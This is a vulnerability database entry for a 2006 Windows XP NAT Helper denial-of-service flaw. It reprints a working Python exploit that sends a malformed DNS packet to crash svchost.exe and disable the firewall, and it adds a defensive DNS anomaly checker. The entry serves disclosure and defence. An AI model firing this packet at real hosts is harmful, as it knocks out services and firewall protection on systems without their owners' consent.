Microsoft Windows NAT Helper Remote Denial of Service Vulnerability

Vulnerability ID: 1111401    Vulnerability type: Other
Published: 2006-10-28    Updated: 2007-11-20
CVE ID: CVE-2006-5614    CNNVD ID: CNNVD-200610-527
Platform: Windows    CVSS score: 2.6
|Vulnerability sources
https://www.exploit-db.com/exploits/2672
https://www.securityfocus.com/bid/20804
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-527
|Vulnerability details
Microsoft Windows is a series of operating systems released by Microsoft Corporation of the United States. The Microsoft Windows NAT Helper component contains a vulnerability in its handling of malformed DNS packets; a remote attacker could exploit it to perform a denial-of-service attack. If a Windows XP user has enabled Internet Connection Sharing (ICS), a remote attacker can crash the service host process (svchost.exe) by sending a DNS packet whose Additional RRs section (also called Additional Information) contains two null bytes. Because the ICS service is tied to the firewall service, an ICS crash also disables the firewall service.
|Vulnerability EXP
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF

# milw0rm.com [2006-10-28]
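The packet in the EXP section declares zero questions and zero RRs in its header yet carries a question body after it. As an added example (not part of the original advisory or the exploit author's code), the following check parses a DNS query and flags that header/body mismatch, which is the sort of sanity test a DNS-aware filter or IDS rule in front of an ICS host would apply. The two sample packets are constructed inline for the demonstration.

```python
import struct

def _read_name(pkt, off):
    """Walk uncompressed DNS labels starting at off; return (name, next_off)."""
    labels = []
    while True:
        if off >= len(pkt):
            raise ValueError("name runs past end of packet")
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer not allowed in a question")
        if off + n > len(pkt):
            raise ValueError("label runs past end of packet")
        labels.append(pkt[off:off + n].decode("ascii", "replace"))
        off += n

def check_dns_query(pkt):
    """Return a list of anomaly strings; an empty list means the query looks sane."""
    anomalies = []
    if len(pkt) < 12:
        return ["truncated header (%d bytes)" % len(pkt)]
    _txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    is_query = not (flags & 0x8000)  # QR bit clear
    off = 12
    try:
        for _ in range(qd):
            _name, off = _read_name(pkt, off)
            if off + 4 > len(pkt):
                raise ValueError("question truncated")
            off += 4  # QTYPE + QCLASS
    except ValueError as e:
        return [str(e)]
    # A query with no answer/authority/additional RRs must end where its questions end.
    if is_query and (an, ns, ar) == (0, 0, 0) and off != len(pkt):
        anomalies.append("header declares %d question(s) and no RRs, but %d byte(s) follow"
                         % (qd, len(pkt) - off))
    if is_query and qd == 0:
        anomalies.append("query with QDCOUNT=0")
    return anomalies

# Constructed samples: the all-zero-count query shape from the advisory (a question
# body follows a header that declares nothing) and a well-formed lookup of the same name.
QUESTION = b"\x03www\x06google\x03com\x00" + b"\x00\x01\x00\x01"
MALFORMED = bytes.fromhex("6cb6 0100 0000 0000 0000 0000") + QUESTION
WELLFORMED = bytes.fromhex("6cb6 0100 0001 0000 0000 0000") + QUESTION
```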
|Affected products
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional SP2 Microsoft Windows XP Pr
|References

Source: SECUNIA
Name: 22592
Link: http://secunia.com/advisories/22592
Source: MILW0RM
Name: 2672
Link: http://milw0rm.com/exploits/2672
Source: XF
Name: win-ipnathlp-dos(29917)
Link: http://xforce.iss.net/xforce/xfdb/29917
Source: BID
Name: 20804
Link: http://www.securityfocus.com/bid/20804
Source: OSVDB
Name: 30096
Link: http://www.osvdb.org/30096
Source: VUPEN
Name: ADV-2006-4248
Link: http://www.frsirt.com/english/advisories/2006/4248
Source: SECTRACK
Name: 1017133
Link: http://securitytracker.com/id?1017133
Source: MISC
Link: http://research.eeye.com/html/alerts/zeroday/20061028.html